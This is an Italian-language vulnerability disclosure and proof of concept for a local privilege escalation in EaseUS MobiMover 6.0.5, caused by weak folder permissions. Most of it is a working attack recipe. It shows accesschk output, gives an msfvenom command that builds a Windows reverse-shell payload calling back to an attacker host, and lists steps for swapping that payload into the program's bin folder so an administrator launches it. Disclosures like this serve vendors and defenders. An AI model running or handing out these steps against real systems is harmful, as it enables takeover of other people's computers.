
EaseUS MobiMover 6.0.5 Build 21620 - Permessi non sicuri su file e cartelle
MobiMoverUILaunch.exe soffre di una vulnerabilità di elevazione dei privilegi che può essere utilizzata da un "Authenticated User" per modificare il file eseguibile del servizio con un binario a sua scelta nella cartella bin. La vulnerabilità esiste a causa di un insieme debole di permessi concessi al "Authenticated Users Group" che concede il flag (M), noto anche come "Modify Privilege"

Sito del fornitore: https://www.easeus.com/
Link del software: https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
Video POC: https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
Crea un file binario malevolo su Kali Linux con msfvenom
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
Trasferisci il file 'prepare.exe' creato all'host Windows da Kali con accesso utente di basso livello
Sposta il file binario 'prepare.exe' creato in 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' per sostituire quello vecchio con accesso utente di basso livello
Quando l'amministratore esegue l'applicazione, otterrai una reverse shell come amministratore